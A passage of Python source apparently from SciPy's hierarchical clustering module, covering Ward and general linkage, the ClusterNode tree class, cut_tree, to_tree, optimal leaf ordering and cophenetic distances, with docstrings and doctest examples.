1, 1, 1, 1, 1], dtype=int32)\n\n Also, `scipy.cluster.hierarchy.dendrogram` can be used to generate a\n plot of the dendrogram.\n\n \"\"\"\n return linkage(y, method='median', metric='euclidean')\n\n\ndef ward(y):\n \"\"\"\n Perform Ward's linkage on a condensed distance matrix.\n\n See `linkage` for more information on the return structure\n and algorithm.\n\n The following are common calling conventions:\n\n 1. ``Z = ward(y)``\n Performs Ward's linkage on the condensed distance matrix ``y``.\n\n 2. ``Z = ward(X)``\n Performs Ward's linkage on the observation matrix ``X`` using\n Euclidean distance as the distance metric.\n\n Parameters\n ----------\n y : ndarray\n A condensed distance matrix. A condensed\n distance matrix is a flat array containing the upper\n triangular of the distance matrix. This is the form that\n ``pdist`` returns. Alternatively, a collection of\n m observation vectors in n dimensions may be passed as\n an m by n array.\n\n Returns\n -------\n Z : ndarray\n The hierarchical clustering encoded as a linkage matrix. See\n `linkage` for more information on the return structure and\n algorithm.\n\n See Also\n --------\n linkage : for advanced creation of hierarchical clusterings.\n scipy.spatial.distance.pdist : pairwise distance metrics\n\n Examples\n --------\n >>> from scipy.cluster.hierarchy import ward, fcluster\n >>> from scipy.spatial.distance import pdist\n\n First, we need a toy dataset to play with::\n\n x x x x\n x x\n\n x x\n x x x x\n\n >>> X = [[0, 0], [0, 1], [1, 0],\n ... [0, 4], [0, 3], [1, 4],\n ... [4, 0], [3, 0], [4, 1],\n ... [4, 4], [3, 4], [4, 3]]\n\n Then, we get a condensed distance matrix from this dataset:\n\n >>> y = pdist(X)\n\n Finally, we can perform the clustering:\n\n >>> Z = ward(y)\n >>> Z\n array([[ 0. , 1. , 1. , 2. ],\n [ 3. , 4. , 1. , 2. ],\n [ 6. , 7. , 1. , 2. ],\n [ 9. , 10. , 1. , 2. ],\n [ 2. , 12. , 1.29099445, 3. ],\n [ 5. , 13. , 1.29099445, 3. ],\n [ 8. , 14. , 1.29099445, 3. ],\n [11. , 15. , 1.29099445, 3. ],\n [16. , 17. , 5.77350269, 6. ],\n [18. , 19. , 5.77350269, 6. ],\n [20. , 21. , 8.16496581, 12. ]])\n\n The linkage matrix ``Z`` represents a dendrogram - see\n `scipy.cluster.hierarchy.linkage` for a detailed explanation of its\n contents.\n\n We can use `scipy.cluster.hierarchy.fcluster` to see to which cluster\n each initial point would belong given a distance threshold:\n\n >>> fcluster(Z, 0.9, criterion='distance')\n array([ 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12], dtype=int32)\n >>> fcluster(Z, 1.1, criterion='distance')\n array([1, 1, 2, 3, 3, 4, 5, 5, 6, 7, 7, 8], dtype=int32)\n >>> fcluster(Z, 3, criterion='distance')\n array([1, 1, 1, 2, 2, 2, 3, 3, 3, 4, 4, 4], dtype=int32)\n >>> fcluster(Z, 9, criterion='distance')\n array([1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], dtype=int32)\n\n Also, `scipy.cluster.hierarchy.dendrogram` can be used to generate a\n plot of the dendrogram.\n\n \"\"\"\n return linkage(y, method='ward', metric='euclidean')\n\n\ndef linkage(y, method='single', metric='euclidean', optimal_ordering=False):\n \"\"\"\n Perform hierarchical/agglomerative clustering.\n\n The input y may be either a 1-D condensed distance matrix\n or a 2-D array of observation vectors.\n\n If y is a 1-D condensed distance matrix,\n then y must be a :math:`\\\\binom{n}{2}` sized\n vector, where n is the number of original observations paired\n in the distance matrix. The behavior of this function is very\n similar to the MATLAB linkage function.\n\n A :math:`(n-1)` by 4 matrix ``Z`` is returned. At the\n :math:`i`-th iteration, clusters with indices ``Z[i, 0]`` and\n ``Z[i, 1]`` are combined to form cluster :math:`n + i`. A\n cluster with an index less than :math:`n` corresponds to one of\n the :math:`n` original observations. The distance between\n clusters ``Z[i, 0]`` and ``Z[i, 1]`` is given by ``Z[i, 2]``. The\n fourth value ``Z[i, 3]`` represents the number of original\n observations in the newly formed cluster.\n\n The following linkage methods are used to compute the distance\n :math:`d(s, t)` between two clusters :math:`s` and\n :math:`t`. The algorithm begins with a forest of clusters that\n have yet to be used in the hierarchy being formed. When two\n clusters :math:`s` and :math:`t` from this forest are combined\n into a single cluster :math:`u`, :math:`s` and :math:`t` are\n removed from the forest, and :math:`u` is added to the\n forest. When only one cluster remains in the forest, the algorithm\n stops, and this cluster becomes the root.\n\n A distance matrix is maintained at each iteration. The ``d[i,j]``\n entry corresponds to the distance between cluster :math:`i` and\n :math:`j` in the original forest.\n\n At each iteration, the algorithm must update the distance matrix\n to reflect the distance of the newly formed cluster u with the\n remaining clusters in the forest.\n\n Suppose there are :math:`|u|` original observations\n :math:`u[0], \\\\ldots, u[|u|-1]` in cluster :math:`u` and\n :math:`|v|` original objects :math:`v[0], \\\\ldots, v[|v|-1]` in\n cluster :math:`v`. Recall, :math:`s` and :math:`t` are\n combined to form cluster :math:`u`. Let :math:`v` be any\n remaining cluster in the forest that is not :math:`u`.\n\n The following are methods for calculating the distance between the\n newly formed cluster :math:`u` and each :math:`v`.\n\n * method='single' assigns\n\n .. math::\n d(u,v) = \\\\min(dist(u[i],v[j]))\n\n for all points :math:`i` in cluster :math:`u` and\n :math:`j` in cluster :math:`v`. This is also known as the\n Nearest Point Algorithm.\n\n * method='complete' assigns\n\n .. math::\n d(u, v) = \\\\max(dist(u[i],v[j]))\n\n for all points :math:`i` in cluster u and :math:`j` in\n cluster :math:`v`. This is also known by the Farthest Point\n Algorithm or Voor Hees Algorithm.\n\n * method='average' assigns\n\n .. math::\n d(u,v) = \\\\sum_{ij} \\\\frac{d(u[i], v[j])}\n {(|u|*|v|)}\n\n for all points :math:`i` and :math:`j` where :math:`|u|`\n and :math:`|v|` are the cardinalities of clusters :math:`u`\n and :math:`v`, respectively. This is also called the UPGMA\n algorithm.\n\n * method='weighted' assigns\n\n .. math::\n d(u,v) = (dist(s,v) + dist(t,v))/2\n\n where cluster u was formed with cluster s and t and v\n is a remaining cluster in the forest (also called WPGMA).\n\n * method='centroid' assigns\n\n .. math::\n dist(s,t) = ||c_s-c_t||_2\n\n where :math:`c_s` and :math:`c_t` are the centroids of\n clusters :math:`s` and :math:`t`, respectively. When two\n clusters :math:`s` and :math:`t` are combined into a new\n cluster :math:`u`, the new centroid is computed over all the\n original objects in clusters :math:`s` and :math:`t`. The\n distance then becomes the Euclidean distance between the\n centroid of :math:`u` and the centroid of a remaining cluster\n :math:`v` in the forest. This is also known as the UPGMC\n algorithm.\n\n * method='median' assigns :math:`d(s,t)` like the ``centroid``\n method. When two clusters :math:`s` and :math:`t` are combined\n into a new cluster :math:`u`, the average of centroids s and t\n give the new centroid :math:`u`. This is also known as the\n WPGMC algorithm.\n\n * method='ward' uses the Ward variance minimization algorithm.\n The new entry :math:`d(u,v)` is computed as follows,\n\n .. math::\n\n d(u,v) = \\\\sqrt{\\\\frac{|v|+|s|}\n {T}d(v,s)^2\n + \\\\frac{|v|+|t|}\n {T}d(v,t)^2\n - \\\\frac{|v|}\n {T}d(s,t)^2}\n\n where :math:`u` is the newly joined cluster consisting of\n clusters :math:`s` and :math:`t`, :math:`v` is an unused\n cluster in the forest, :math:`T=|v|+|s|+|t|`, and\n :math:`|*|` is the cardinality of its argument. This is also\n known as the incremental algorithm.\n\n Warning: When the minimum distance pair in the forest is chosen, there\n may be two or more pairs with the same minimum distance. This\n implementation may choose a different minimum than the MATLAB\n version.\n\n Parameters\n ----------\n y : ndarray\n A condensed distance matrix. A condensed distance matrix\n is a flat array containing the upper triangular of the distance matrix.\n This is the form that ``pdist`` returns. Alternatively, a collection of\n :math:`m` observation vectors in :math:`n` dimensions may be passed as\n an :math:`m` by :math:`n` array. All elements of the condensed distance\n matrix must be finite, i.e., no NaNs or infs.\n method : str, optional\n The linkage algorithm to use. See the ``Linkage Methods`` section below\n for full descriptions.\n metric : str or function, optional\n The distance metric to use in the case that y is a collection of\n observation vectors; ignored otherwise. See the ``pdist``\n function for a list of valid distance metrics. A custom distance\n function can also be used.\n optimal_ordering : bool, optional\n If True, the linkage matrix will be reordered so that the distance\n between successive leaves is minimal. This results in a more intuitive\n tree structure when the data are visualized. defaults to False, because\n this algorithm can be slow, particularly on large datasets [2]_. See\n also the `optimal_leaf_ordering` function.\n\n .. versionadded:: 1.0.0\n\n Returns\n -------\n Z : ndarray\n The hierarchical clustering encoded as a linkage matrix.\n\n Notes\n -----\n 1. For method 'single', an optimized algorithm based on minimum spanning\n tree is implemented. It has time complexity :math:`O(n^2)`.\n For methods 'complete', 'average', 'weighted' and 'ward', an algorithm\n called nearest-neighbors chain is implemented. It also has time\n complexity :math:`O(n^2)`.\n For other methods, a naive algorithm is implemented with :math:`O(n^3)`\n time complexity.\n All algorithms use :math:`O(n^2)` memory.\n Refer to [1]_ for details about the algorithms.\n 2. Methods 'centroid', 'median', and 'ward' are correctly defined only if\n Euclidean pairwise metric is used. If `y` is passed as precomputed\n pairwise distances, then it is the user's responsibility to assure that\n these distances are in fact Euclidean, otherwise the produced result\n will be incorrect.\n\n See Also\n --------\n scipy.spatial.distance.pdist : pairwise distance metrics\n\n References\n ----------\n .. [1] Daniel Mullner, \"Modern hierarchical, agglomerative clustering\n algorithms\", :arXiv:`1109.2378v1`.\n .. [2] Ziv Bar-Joseph, David K. Gifford, Tommi S. Jaakkola, \"Fast optimal\n leaf ordering for hierarchical clustering\", 2001. Bioinformatics\n :doi:`10.1093/bioinformatics/17.suppl_1.S22`\n\n Examples\n --------\n >>> from scipy.cluster.hierarchy import dendrogram, linkage\n >>> from matplotlib import pyplot as plt\n >>> X = [[i] for i in [2, 8, 0, 4, 1, 9, 9, 0]]\n\n >>> Z = linkage(X, 'ward')\n >>> fig = plt.figure(figsize=(25, 10))\n >>> dn = dendrogram(Z)\n\n >>> Z = linkage(X, 'single')\n >>> fig = plt.figure(figsize=(25, 10))\n >>> dn = dendrogram(Z)\n >>> plt.show()\n \"\"\"\n xp = array_namespace(y)\n y = as_xparray(y, order='C', dtype=xp.float64, xp=xp)\n\n if method not in _LINKAGE_METHODS:\n raise ValueError(f\"Invalid method: {method}\")\n\n if method in _EUCLIDEAN_METHODS and metric != 'euclidean' and y.ndim == 2:\n msg = f\"`method={method}` requires the distance metric to be Euclidean\"\n raise ValueError(msg)\n\n if y.ndim == 1:\n distance.is_valid_y(y, throw=True, name='y')\n elif y.ndim == 2:\n if (y.shape[0] == y.shape[1] and np.allclose(np.diag(y), 0) and\n xp.all(y >= 0) and np.allclose(y, y.T)):\n warnings.warn('The symmetric non-negative hollow observation '\n 'matrix looks suspiciously like an uncondensed '\n 'distance matrix',\n ClusterWarning, stacklevel=2)\n y = distance.pdist(y, metric)\n y = xp.asarray(y)\n else:\n raise ValueError(\"`y` must be 1 or 2 dimensional.\")\n\n if not xp.all(xp.isfinite(y)):\n raise ValueError(\"The condensed distance matrix must contain only \"\n \"finite values.\")\n\n n = int(distance.num_obs_y(y))\n method_code = _LINKAGE_METHODS[method]\n\n y = np.asarray(y)\n if method == 'single':\n result = _hierarchy.mst_single_linkage(y, n)\n elif method in ['complete', 'average', 'weighted', 'ward']:\n result = _hierarchy.nn_chain(y, n, method_code)\n else:\n result = _hierarchy.fast_linkage(y, n, method_code)\n result = xp.asarray(result)\n\n if optimal_ordering:\n y = xp.asarray(y)\n return optimal_leaf_ordering(result, y)\n else:\n return result\n\n\nclass ClusterNode:\n \"\"\"\n A tree node class for representing a cluster.\n\n Leaf nodes correspond to original observations, while non-leaf nodes\n correspond to non-singleton clusters.\n\n The `to_tree` function converts a matrix returned by the linkage\n function into an easy-to-use tree representation.\n\n All parameter names are also attributes.\n\n Parameters\n ----------\n id : int\n The node id.\n left : ClusterNode instance, optional\n The left child tree node.\n right : ClusterNode instance, optional\n The right child tree node.\n dist : float, optional\n Distance for this cluster in the linkage matrix.\n count : int, optional\n The number of samples in this cluster.\n\n See Also\n --------\n to_tree : for converting a linkage matrix ``Z`` into a tree object.\n\n \"\"\"\n\n def __init__(self, id, left=None, right=None, dist=0, count=1):\n if id < 0:\n raise ValueError('The id must be non-negative.')\n if dist < 0:\n raise ValueError('The distance must be non-negative.')\n if (left is None and right is not None) or \\\n (left is not None and right is None):\n raise ValueError('Only full or proper binary trees are permitted.'\n ' This node has one child.')\n if count < 1:\n raise ValueError('A cluster must contain at least one original '\n 'observation.')\n self.id = id\n self.left = left\n self.right = right\n self.dist = dist\n if self.left is None:\n self.count = count\n else:\n self.count = left.count + right.count\n\n def __lt__(self, node):\n if not isinstance(node, ClusterNode):\n raise ValueError(\"Can't compare ClusterNode \"\n f\"to type {type(node)}\")\n return self.dist < node.dist\n\n def __gt__(self, node):\n if not isinstance(node, ClusterNode):\n raise ValueError(\"Can't compare ClusterNode \"\n f\"to type {type(node)}\")\n return self.dist > node.dist\n\n def __eq__(self, node):\n if not isinstance(node, ClusterNode):\n raise ValueError(\"Can't compare ClusterNode \"\n f\"to type {type(node)}\")\n return self.dist == node.dist\n\n def get_id(self):\n \"\"\"\n The identifier of the target node.\n\n For ``0 <= i < n``, `i` corresponds to original observation i.\n For ``n <= i < 2n-1``, `i` corresponds to non-singleton cluster formed\n at iteration ``i-n``.\n\n Returns\n -------\n id : int\n The identifier of the target node.\n\n \"\"\"\n return self.id\n\n def get_count(self):\n \"\"\"\n The number of leaf nodes (original observations) belonging to\n the cluster node nd. If the target node is a leaf, 1 is\n returned.\n\n Returns\n -------\n get_count : int\n The number of leaf nodes below the target node.\n\n \"\"\"\n return self.count\n\n def get_left(self):\n \"\"\"\n Return a reference to the left child tree object.\n\n Returns\n -------\n left : ClusterNode\n The left child of the target node. If the node is a leaf,\n None is returned.\n\n \"\"\"\n return self.left\n\n def get_right(self):\n \"\"\"\n Return a reference to the right child tree object.\n\n Returns\n -------\n right : ClusterNode\n The left child of the target node. If the node is a leaf,\n None is returned.\n\n \"\"\"\n return self.right\n\n def is_leaf(self):\n \"\"\"\n Return True if the target node is a leaf.\n\n Returns\n -------\n leafness : bool\n True if the target node is a leaf node.\n\n \"\"\"\n return self.left is None\n\n def pre_order(self, func=(lambda x: x.id)):\n \"\"\"\n Perform pre-order traversal without recursive function calls.\n\n When a leaf node is first encountered, ``func`` is called with\n the leaf node as its argument, and its result is appended to\n the list.\n\n For example, the statement::\n\n ids = root.pre_order(lambda x: x.id)\n\n returns a list of the node ids corresponding to the leaf nodes\n of the tree as they appear from left to right.\n\n Parameters\n ----------\n func : function\n Applied to each leaf ClusterNode object in the pre-order traversal.\n Given the ``i``-th leaf node in the pre-order traversal ``n[i]``,\n the result of ``func(n[i])`` is stored in ``L[i]``. If not\n provided, the index of the original observation to which the node\n corresponds is used.\n\n Returns\n -------\n L : list\n The pre-order traversal.\n\n \"\"\"\n # Do a preorder traversal, caching the result. To avoid having to do\n # recursion, we'll store the previous index we've visited in a vector.\n n = self.count\n\n curNode = [None] * (2 * n)\n lvisited = set()\n rvisited = set()\n curNode[0] = self\n k = 0\n preorder = []\n while k >= 0:\n nd = curNode[k]\n ndid = nd.id\n if nd.is_leaf():\n preorder.append(func(nd))\n k = k - 1\n else:\n if ndid not in lvisited:\n curNode[k + 1] = nd.left\n lvisited.add(ndid)\n k = k + 1\n elif ndid not in rvisited:\n curNode[k + 1] = nd.right\n rvisited.add(ndid)\n k = k + 1\n # If we've visited the left and right of this non-leaf\n # node already, go up in the tree.\n else:\n k = k - 1\n\n return preorder\n\n\n_cnode_bare = ClusterNode(0)\n_cnode_type = type(ClusterNode)\n\n\ndef _order_cluster_tree(Z):\n \"\"\"\n Return clustering nodes in bottom-up order by distance.\n\n Parameters\n ----------\n Z : scipy.cluster.linkage array\n The linkage matrix.\n\n Returns\n -------\n nodes : list\n A list of ClusterNode objects.\n \"\"\"\n q = deque()\n tree = to_tree(Z)\n q.append(tree)\n nodes = []\n\n while q:\n node = q.popleft()\n if not node.is_leaf():\n bisect.insort_left(nodes, node)\n q.append(node.get_right())\n q.append(node.get_left())\n return nodes\n\n\ndef cut_tree(Z, n_clusters=None, height=None):\n \"\"\"\n Given a linkage matrix Z, return the cut tree.\n\n Parameters\n ----------\n Z : scipy.cluster.linkage array\n The linkage matrix.\n n_clusters : array_like, optional\n Number of clusters in the tree at the cut point.\n height : array_like, optional\n The height at which to cut the tree. Only possible for ultrametric\n trees.\n\n Returns\n -------\n cutree : array\n An array indicating group membership at each agglomeration step. I.e.,\n for a full cut tree, in the first column each data point is in its own\n cluster. At the next step, two nodes are merged. Finally, all\n singleton and non-singleton clusters are in one group. If `n_clusters`\n or `height` are given, the columns correspond to the columns of\n `n_clusters` or `height`.\n\n Examples\n --------\n >>> from scipy import cluster\n >>> import numpy as np\n >>> from numpy.random import default_rng\n >>> rng = default_rng()\n >>> X = rng.random((50, 4))\n >>> Z = cluster.hierarchy.ward(X)\n >>> cutree = cluster.hierarchy.cut_tree(Z, n_clusters=[5, 10])\n >>> cutree[:10]\n array([[0, 0],\n [1, 1],\n [2, 2],\n [3, 3],\n [3, 4],\n [2, 2],\n [0, 0],\n [1, 5],\n [3, 6],\n [4, 7]]) # random\n\n \"\"\"\n xp = array_namespace(Z)\n nobs = num_obs_linkage(Z)\n nodes = _order_cluster_tree(Z)\n\n if height is not None and n_clusters is not None:\n raise ValueError(\"At least one of either height or n_clusters \"\n \"must be None\")\n elif height is None and n_clusters is None: # return the full cut tree\n cols_idx = xp.arange(nobs)\n elif height is not None:\n height = xp.asarray(height)\n heights = xp.asarray([x.dist for x in nodes])\n cols_idx = xp.searchsorted(heights, height)\n else:\n n_clusters = xp.asarray(n_clusters)\n cols_idx = nobs - xp.searchsorted(xp.arange(nobs), n_clusters)\n\n try:\n n_cols = len(cols_idx)\n except TypeError: # scalar\n n_cols = 1\n cols_idx = xp.asarray([cols_idx])\n\n groups = xp.zeros((n_cols, nobs), dtype=xp.int64)\n last_group = xp.arange(nobs)\n if 0 in cols_idx:\n groups[0] = last_group\n\n for i, node in enumerate(nodes):\n idx = node.pre_order()\n this_group = copy(last_group, xp=xp)\n # TODO ARRAY_API complex indexing not supported\n this_group[idx] = xp.min(last_group[idx])\n this_group[this_group > xp.max(last_group[idx])] -= 1\n if i + 1 in cols_idx:\n groups[np.nonzero(i + 1 == cols_idx)[0]] = this_group\n last_group = this_group\n\n return groups.T\n\n\ndef to_tree(Z, rd=False):\n \"\"\"\n Convert a linkage matrix into an easy-to-use tree object.\n\n The reference to the root `ClusterNode` object is returned (by default).\n\n Each `ClusterNode` object has a ``left``, ``right``, ``dist``, ``id``,\n and ``count`` attribute. The left and right attributes point to\n ClusterNode objects that were combined to generate the cluster.\n If both are None then the `ClusterNode` object is a leaf node, its count\n must be 1, and its distance is meaningless but set to 0.\n\n *Note: This function is provided for the convenience of the library\n user. ClusterNodes are not used as input to any of the functions in this\n library.*\n\n Parameters\n ----------\n Z : ndarray\n The linkage matrix in proper form (see the `linkage`\n function documentation).\n rd : bool, optional\n When False (default), a reference to the root `ClusterNode` object is\n returned. Otherwise, a tuple ``(r, d)`` is returned. ``r`` is a\n reference to the root node while ``d`` is a list of `ClusterNode`\n objects - one per original entry in the linkage matrix plus entries\n for all clustering steps. If a cluster id is\n less than the number of samples ``n`` in the data that the linkage\n matrix describes, then it corresponds to a singleton cluster (leaf\n node).\n See `linkage` for more information on the assignment of cluster ids\n to clusters.\n\n Returns\n -------\n tree : ClusterNode or tuple (ClusterNode, list of ClusterNode)\n If ``rd`` is False, a `ClusterNode`.\n If ``rd`` is True, a list of length ``2*n - 1``, with ``n`` the number\n of samples. See the description of `rd` above for more details.\n\n See Also\n --------\n linkage, is_valid_linkage, ClusterNode\n\n Examples\n --------\n >>> import numpy as np\n >>> from scipy.cluster import hierarchy\n >>> rng = np.random.default_rng()\n >>> x = rng.random((5, 2))\n >>> Z = hierarchy.linkage(x)\n >>> hierarchy.to_tree(Z)\n >> rootnode, nodelist = hierarchy.to_tree(Z, rd=True)\n >>> rootnode\n >> len(nodelist)\n 9\n\n \"\"\"\n xp = array_namespace(Z)\n Z = as_xparray(Z, order='c', xp=xp)\n is_valid_linkage(Z, throw=True, name='Z')\n\n # Number of original objects is equal to the number of rows plus 1.\n n = Z.shape[0] + 1\n\n # Create a list full of None's to store the node objects\n d = [None] * (n * 2 - 1)\n\n # Create the nodes corresponding to the n original objects.\n for i in range(0, n):\n d[i] = ClusterNode(i)\n\n nd = None\n\n for i in range(Z.shape[0]):\n row = Z[i, :]\n\n fi = int_floor(row[0], xp)\n fj = int_floor(row[1], xp)\n if fi > i + n:\n raise ValueError(('Corrupt matrix Z. Index to derivative cluster '\n 'is used before it is formed. See row %d, '\n 'column 0') % fi)\n if fj > i + n:\n raise ValueError(('Corrupt matrix Z. Index to derivative cluster '\n 'is used before it is formed. See row %d, '\n 'column 1') % fj)\n\n nd = ClusterNode(i + n, d[fi], d[fj], row[2])\n # ^ id ^ left ^ right ^ dist\n if row[3] != nd.count:\n raise ValueError(('Corrupt matrix Z. The count Z[%d,3] is '\n 'incorrect.') % i)\n d[n + i] = nd\n\n if rd:\n return (nd, d)\n else:\n return nd\n\n\ndef optimal_leaf_ordering(Z, y, metric='euclidean'):\n \"\"\"\n Given a linkage matrix Z and distance, reorder the cut tree.\n\n Parameters\n ----------\n Z : ndarray\n The hierarchical clustering encoded as a linkage matrix. See\n `linkage` for more information on the return structure and\n algorithm.\n y : ndarray\n The condensed distance matrix from which Z was generated.\n Alternatively, a collection of m observation vectors in n\n dimensions may be passed as an m by n array.\n metric : str or function, optional\n The distance metric to use in the case that y is a collection of\n observation vectors; ignored otherwise. See the ``pdist``\n function for a list of valid distance metrics. A custom distance\n function can also be used.\n\n Returns\n -------\n Z_ordered : ndarray\n A copy of the linkage matrix Z, reordered to minimize the distance\n between adjacent leaves.\n\n Examples\n --------\n >>> import numpy as np\n >>> from scipy.cluster import hierarchy\n >>> rng = np.random.default_rng()\n >>> X = rng.standard_normal((10, 10))\n >>> Z = hierarchy.ward(X)\n >>> hierarchy.leaves_list(Z)\n array([0, 3, 1, 9, 2, 5, 7, 4, 6, 8], dtype=int32)\n >>> hierarchy.leaves_list(hierarchy.optimal_leaf_ordering(Z, X))\n array([3, 0, 2, 5, 7, 4, 8, 6, 9, 1], dtype=int32)\n\n \"\"\"\n xp = array_namespace(Z, y)\n Z = as_xparray(Z, order='C', xp=xp)\n is_valid_linkage(Z, throw=True, name='Z')\n\n y = as_xparray(y, order='C', dtype=xp.float64, xp=xp)\n\n if y.ndim == 1:\n distance.is_valid_y(y, throw=True, name='y')\n elif y.ndim == 2:\n if (y.shape[0] == y.shape[1] and np.allclose(np.diag(y), 0) and\n np.all(y >= 0) and np.allclose(y, y.T)):\n warnings.warn('The symmetric non-negative hollow observation '\n 'matrix looks suspiciously like an uncondensed '\n 'distance matrix',\n ClusterWarning, stacklevel=2)\n y = distance.pdist(y, metric)\n y = xp.asarray(y)\n else:\n raise ValueError(\"`y` must be 1 or 2 dimensional.\")\n\n if not xp.all(xp.isfinite(y)):\n raise ValueError(\"The condensed distance matrix must contain only \"\n \"finite values.\")\n\n Z = np.asarray(Z)\n y = np.asarray(y)\n return xp.asarray(_optimal_leaf_ordering.optimal_leaf_ordering(Z, y))\n\n\ndef cophenet(Z, Y=None):\n \"\"\"\n Calculate the cophenetic distances between each observation in\n the hierarchical clustering defined by the linkage ``Z``.\n\n Suppose ``p`` and ``q`` are original observations in\n disjoint clusters ``s`` and ``t``, respectively and\n ``s`` and ``t`` are joined by a direct parent cluster\n ``u``. The cophenetic distance between observations\n ``i`` and ``j`` is simply the distance between\n clusters ``s`` and ``t``.\n\n Parameters\n ----------\n Z : ndarray\n The hierarchical clustering encoded as an array\n (see `linkage` function).\n Y : ndarray (optional)\n Calculates the cophenetic correlation coefficient ``c`` of a\n hierarchical clustering defined by the linkage matrix `Z`\n of a set of :math:`n` observations in :math:`m`\n dimensions. `Y` is the condensed distance matrix from which\n `Z` was generated.\n\n Returns\n -------\n c : ndarray\n The cophentic correlation distance (if ``Y`` is passed).\n d : ndarray\n The cophenetic distance matrix in condensed form. The\n :math:`ij` th entry is the cophenetic distance between\n original observations :math:`i` and :math:`j`.\n\n See Also\n --------\n linkage :\n for a description of what a linkage matrix is.\n scipy.spatial.distance.squareform :\n transforming condensed matrices into square ones.\n\n Examples\n --------\n >>> from scipy.cluster.hierarchy import single, cophenet\n >>> from scipy.spatial.distance import pdist, squareform\n\n Given a dataset ``X`` and a linkage matrix ``Z``, the cophenetic distance\n between two points of ``X`` is the distance between the largest two\n distinct clusters that each of the points:\n\n >>> X = [[0, 0], [0, 1], [1, 0],\n ... [0, 4], [0, 3], [1, 4],\n ... [4, 0], [3, 0], [4, 1],\n ... [4, 4], [3, 4], [4, 3]]\n\n ``X`` corresponds to this dataset ::\n\n x x x x\n x x\n\n x x\n x x x x\n\n >>> Z = single(pdist(X))\n >>> Z\n array([[ 0., 1., 1., 2.],\n [ 2., 12., 1., 3.],\n [ 3., 4., 1., 2.],\n [ 5., 14., 1., 3.],\n [ 6., 7., 1., 2.],\n [ 8., 16., 1., 3.],\n [ 9., 10., 1., 2.],\n [11., 18., 1., 3.],\n [13., 15., 2., 6.],\n [17., 20., 2., 9.],\n [19., 21., 2., 12.]])\n >>> cophenet(Z)\n array([1., 1., 2., 2., 2., 2., 2., 2., 2., 2., 2., 1., 2., 2., 2., 2., 2.,\n 2., 2., 2., 2., 2., 2., 2., 2., 2., 2., 2., 2., 2., 1., 1., 2., 2.,\n 2., 2., 2., 2., 1., 2., 2., 2., 2., 2., 2., 2., 2., 2., 2., 2., 2.,\n 1., 1., 2., 2., 2., 1., 2., 2., 2., 2., 2., 2., 1., 1., 1.])\n\n The output of the `scipy.cluster.hierarchy.cophenet` method is\n represented in condensed form. We can use\n `scipy.spatial.distance.squareform` to see the output as a\n regular matrix (where each element ``ij`` denotes the cophenetic distance\n between each ``i``, ``j`` pair of points in ``X``):\n\n >>> squareform(cophenet(Z))\n array([[0., 1., 1., 2., 2., 2., 2., 2., 2., 2., 2., 2.],\n [1., 0., 1., 2., 2., 2., 2., 2., 2., 2., 2., 2.],\n [1., 1., 0., 2., 2., 2., 2., 2., 2., 2., 2., 2.],\n [2., 2., 2., 0., 1., 1., 2., 2., 2., 2., 2., 2.],\n [2., 2., 2., 1., 0., 1., 2., 2., 2., 2., 2., 2.],\n [2., 2., 2., 1., 1., 0., 2., 2., 2., 2., 2., 2.],\n [2., 2., 2., 2., 2., 2., 0., 1., 1., 2., 2., 2.],\n [2., 2., 2., 2., 2., 2., 1., 0., 1., 2., 2., 2.],\n [2., 2., 2., 2., 2., 2., 1., 1., 0., 2., 2., 2.],\n [2., 2., 2., 2., 2., 2., 2., 2., 2., 0., 1., 1.],\n [2., 2., 2., 2., 2., 2., 2., 2., 2., 1., 0., 1.],\n [2., 2., 2., 2., 2., 2., 2., 2., 2., 1., 1., 0.]])\n\n In this example, the cophenetic distance between points on ``X`` that are\n very close (i.e., in the same corner) is 1. For other pairs of points is 2,\n because the points will be located in clusters at different\n corners - thus, the distance between these clusters will be larger.\n\n \"\"\"\n xp = array_namespace(Z, Y)\n # Ensure float64 C-contiguous array. Cython code doesn't deal with striding.\n Z = as_xparray(Z, order='C', dtype=xp.float64, xp=xp)\n is_valid_linkage(Z, throw=True, name='Z')\n n = Z.shape[0] + 1\n zz = np.zeros((n * (n-1)) // 2, dtype=np.float64)\n\n Z = np.asarray(Z)\n _hierarchy.cophenetic_distances(Z, zz, int(n))\n zz = xp.asarray(zz)\n if Y is None:\n return zz\n\n Y = as_xparray(Y, order='C', xp=xp)\n distance.is_valid_y(Y, throw=True, name='Y')\n\n z = xp.mean(zz)\n y = xp.mean(Y)\n Yy = Y - y\n Zz = zz - z\n numerator = (Yy * Zz)\n denomA = Yy**2\n denomB = Zz**2\n c = xp.sum(numerator) / xp.sqrt(xp.sum(denomA) * xp.sum(denomB))\n return (c, zz)\n\n\ndef inconsistent(Z, d=2):\n r\"\"\"\n Calculate inconsistency statistics on a linkage matrix.\n\n Parameters\n ----------\n Z : ndarray\n The :math:`(n-1)` by 4 matrix encoding the linkage (hierarchical\n clustering). See `linkage` documentation for more information on its\n form.\n d : int, optional\n The number of links up to `d` levels below each non-singleton cluster.\n\n Returns\n -------\n R : ndarray\n A :math:`(n-1)` by 4 matrix where the ``i``'th row contains the link\n statistics for the non-singleton cluster ``i``. The link statistics are\n computed over the link heights for links :math:`d` levels below the\n cluster ``i``. ``R[i,0]`` and ``R[i,1]`` are the mean and standard\n deviation of the link heights, respectively; ``R[i,2]`` is the number\n of links included in the calculation; and ``R[i,3]`` is the\n inconsistency coefficient,\n\n .. math:: \\frac{\\mathtt{Z[i,2]} - \\mathtt{R[i,0]}} {R[i,1]}\n\n Notes\n -----\n This function behaves similarly to the MATLAB(TM) ``inconsistent``\n function.\n\n Examples\n --------\n >>> from scipy.cluster.hierarchy import inconsistent, linkage\n >>> from matplotlib import pyplot as plt\n >>> X = [[i] for i in [2, 8, 0, 4, 1, 9, 9, 0]]\n >>> Z = linkage(X, 'ward')\n >>> print(Z)\n [[ 5. 6. 0. 2. ]\n [ 2. 7. 0. 2. ]\n [ 0. 4. 1. 2. ]\n [ 1. 8. 1.15470054 3. ]\n [ 9. 10. 2.12132034 4. ]\n [ 3. 12. 4.11096096 5. ]\n [11. 13. 14.07183949 8. ]]\n >>> inconsistent(Z)\n array([[ 0. , 0. , 1. , 0. ],\n [ 0. , 0. , 1. , 0. ],\n [ 1. , 0. , 1. , 0. ],\n [ 0.57735027, 0.81649658, 2. , 0.70710678],\n [ 1.04044011, 1.06123822, 3. , 1.01850858],\n [ 3.11614065, 1.40688837, 2. , 0.70710678],\n [ 6.44583366, 6.76770586, 3. , 1.12682288]])\n\n \"\"\"\n xp = array_namespace(Z)\n Z = as_xparray(Z, order='C', dtype=xp.float64, xp=xp)\n is_valid_linkage(Z, 